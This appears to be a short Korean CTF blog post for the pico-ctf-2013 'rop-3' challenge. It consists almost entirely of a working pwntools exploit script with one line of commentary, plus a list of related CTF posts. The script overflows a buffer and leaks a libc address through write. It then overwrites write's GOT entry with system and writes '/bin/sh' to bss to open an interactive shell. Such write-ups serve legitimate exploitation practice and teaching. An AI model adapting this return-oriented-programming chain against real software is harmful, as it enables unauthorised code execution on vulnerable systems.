rop1,2와 동일하게 품
exploit code
from pwn import *
p = process('./rop3-7f3312fe43c46d26')
read_plt = 0x8048360
read_got = 0x804a000
write_plt = 0x80483a0
write_got = 0x804a010
bss = 0x804a020
system_offset = 0x9ad60
pppr = 0x804855d
pr = 0x8048344
binsh = "/bin/sh"
payload = "A"*140
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(read_got)
payload += p32(4)
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(len(binsh)+1)
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(write_got)
payload += p32(4)
payload += p32(write_plt)
payload += p32(pr)
payload += p32(bss)
log.info("Exploit..")
p.sendline(payload)
read_addr = u32(p.recv()[-4:])
log.info("read_addr = {}".format(hex(read_addr)))
system_addr = read_addr - system_offset
log.info("system_addr = {}".format(hex(system_addr)))
p.sendline(binsh)
p.sendline(p32(system_addr))
p.interactive()
'CTF' 카테고리의 다른 글
| CodeGate 2017 babypwn (1) | 2018.07.18 |
|---|---|
| pico-ctf-2013 rop-4 (0) | 2018.07.17 |
| pico-ctf-2013 rop-2 (0) | 2018.07.14 |
| pico-ctf-2013 rop-1 (0) | 2018.07.14 |
| PlaidCTF 2013 ropasaurusrex (0) | 2018.07.14 |